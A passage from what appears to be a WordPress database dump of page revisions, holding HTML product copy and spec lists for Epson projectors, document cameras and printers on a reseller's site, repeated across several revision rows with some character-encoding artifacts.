id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:25:29','2019-09-25 09:25:29','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3467,1,'2019-09-25 17:26:09','2019-09-25 09:26:09','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:26:09','2019-09-25 09:26:09','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3468,1,'2019-09-25 17:26:37','2019-09-25 09:26:37','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With 